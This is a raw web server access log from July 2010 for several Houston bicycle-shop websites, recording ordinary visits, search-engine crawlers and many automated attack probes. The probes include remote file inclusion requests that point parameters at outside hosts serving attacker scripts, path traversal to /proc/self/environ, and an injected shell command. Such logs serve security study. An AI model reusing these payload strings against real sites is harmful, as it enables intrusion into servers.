76.30.177.190 - - [09/Jul/2010:21:18:56 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:18:56 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:00 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:01 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:03 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:03 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:04 -0700] "GET / HTTP/1.1" 200 1764 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:04 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:07 -0700] "GET /blog/ HTTP/1.1" 401 - "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:09 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:11 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:15 -0700] "GET /tmp/ HTTP/1.1" 200 659 "http://www.svbikes.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:15 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
76.30.177.190 - - [09/Jul/2010:21:19:17 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" "www.svbikes.com"
212.122.188.156 - - [09/Jul/2010:21:22:46 -0700] "GET /logs/access_100510.log//?include_dir=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
212.122.188.156 - - [09/Jul/2010:21:22:47 -0700] "GET /?include_dir=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "www.svbikes.com"
212.122.188.156 - - [09/Jul/2010:21:22:47 -0700] "GET /logs//?include_dir=http://solid.go.ro/poze/myid.jpg? HTTP/1.1" 200 2945 "-" "libwww-perl/5.805" "www.svbikes.com"
78.30.215.189 - - [09/Jul/2010:21:29:48 -0700] "GET /logs/access.log HTTP/1.0" 200 29190 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "houstonbikeshop.com"
67.195.37.172 - - [09/Jul/2010:21:40:34 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
67.195.37.172 - - [09/Jul/2010:21:40:37 -0700] "GET /bullitinboard/viewtopic.php?p=4419 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
207.46.204.196 - - [09/Jul/2010:21:54:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
207.46.204.196 - - [09/Jul/2010:21:56:06 -0700] "GET /?D=A HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:00:27 -0700] "GET /logs/access_100510.log/index.php?option=com_pccookbook&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:00:27 -0700] "GET /index.php?option=com_pccookbook&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:00:27 -0700] "GET /logs/index.php?option=com_pccookbook&id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:31 -0700] "GET /logs/access_100510.log/index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:32 -0700] "GET /logs/access_100510.log/index.php?option=com_pccookbook&limit=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:40 -0700] "GET /index.php?option=com_pccookbook&limit=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:43 -0700] "GET /logs/index.php?option=com_pccookbook&limit=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:44 -0700] "GET /index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:46 -0700] "GET /logs/index.php?option=com_pccookbook&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:51 -0700] "GET /logs/access_100510.log/index.php?option=com_pccookbook&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:53 -0700] "GET /index.php?option=com_pccookbook&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
64.34.178.107 - - [09/Jul/2010:22:01:55 -0700] "GET /logs/index.php?option=com_pccookbook&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
83.16.100.218 - - [09/Jul/2010:22:04:54 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.100.218 - - [09/Jul/2010:22:04:54 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.16.100.218 - - [09/Jul/2010:22:04:54 -0700] "GET /logs/access.log%20%20/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:22:05:01 -0700] "GET /translations/Welsh.txt HTTP/1.1" 200 35212 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
174.142.61.241 - - [09/Jul/2010:22:34:39 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
174.142.61.241 - - [09/Jul/2010:22:35:00 -0700] "GET /logs/access.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
174.142.61.241 - - [09/Jul/2010:22:35:00 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
174.142.61.241 - - [09/Jul/2010:22:35:00 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
87.250.252.242 - - [09/Jul/2010:22:47:28 -0700] "GET /logs/access_091210.log HTTP/1.1" 200 5199133 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
119.63.193.75 - - [09/Jul/2010:22:52:43 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.0" 200 112 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
119.63.193.75 - - [09/Jul/2010:22:54:44 -0700] "GET /bullitinboard/viewtopic.php?p=11516 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:23:21:04 -0700] "GET /*.index/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:21 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:21 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:21 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:42 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:42 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [09/Jul/2010:23:21:42 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:23:35:22 -0700] "GET /logs/access.log/*.index/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:23:35:23 -0700] "GET /*.index/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
91.121.92.195 - - [09/Jul/2010:23:35:23 -0700] "GET /logs/*.index/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
203.88.115.153 - - [09/Jul/2010:23:35:40 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [09/Jul/2010:23:35:40 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [09/Jul/2010:23:35:40 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:49 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:49 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:49 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:49 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:52 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
69.80.227.231 - - [09/Jul/2010:23:38:52 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
78.30.215.189 - - [09/Jul/2010:23:39:18 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 2752512 "http://svbikes.com/logs/access_100310.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "svbikes.com"
67.195.112.217 - - [09/Jul/2010:23:39:28 -0700] "GET /bullitinboard/viewtopic.php?p=15647 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
87.250.252.242 - - [09/Jul/2010:23:39:54 -0700] "GET /translations/German.txt HTTP/1.1" 200 29272 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
188.120.32.164 - - [09/Jul/2010:23:46:39 -0700] "GET /logs///skin/ggambo7002_board////write.phpdir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [09/Jul/2010:23:46:39 -0700] "GET //skin/ggambo7002_board////write.phpdir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [09/Jul/2010:23:46:39 -0700] "GET /logs/access.log%20%20///skin/ggambo7002_board////write.phpdir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:19 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:19 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:19 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:20 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:20 -0700] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [09/Jul/2010:23:48:20 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
67.195.114.243 - - [09/Jul/2010:23:54:41 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
67.195.114.243 - - [09/Jul/2010:23:54:42 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.houstonbikeshop.com"
193.105.210.172 - - [09/Jul/2010:23:59:07 -0700] "GET /logs/access.log HTTP/1.0" 200 42502 "http://houstonbikeshop.com/logs/access.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; .NET CLR 1.0.2914)" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:41 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:41 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:41 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:41 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:42 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:42 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:47 -0700] "GET /logs/access.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:47 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:00:48 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.47.193.55 - - [10/Jul/2010:00:02:47 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.soundtaxi.org" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "houstonbikeshop.com"
77.47.193.55 - - [10/Jul/2010:00:02:47 -0700] "GET / HTTP/1.0" 200 1748 "http://houstonbikeshop.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "houstonbikeshop.com"
77.47.193.55 - - [10/Jul/2010:00:02:49 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://houstonbikeshop.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "houstonbikeshop.com"
196.41.123.167 - - [10/Jul/2010:00:08:41 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.namima.info/Admin/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
196.41.123.167 - - [10/Jul/2010:00:08:41 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=%7Cecho%20%22casper%22;echo%20%22kae%22%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:11:42 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [10/Jul/2010:00:11:42 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
188.120.32.164 - - [10/Jul/2010:00:11:43 -0700] "GET /logs/access_100510.log///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
203.88.115.153 - - [10/Jul/2010:00:14:13 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:13 -0700] "GET /index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:14 -0700] "GET /logs//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:14 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:15 -0700] "GET /index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:15 -0700] "GET /logs//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:23 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:23 -0700] "GET /index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
203.88.115.153 - - [10/Jul/2010:00:14:24 -0700] "GET /logs//index.php?option=com_virtuemart&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:16:06 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:16:07 -0700] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:16:07 -0700] "GET /logs/access.log///skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
188.120.32.164 - - [10/Jul/2010:00:16:08 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?dir=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
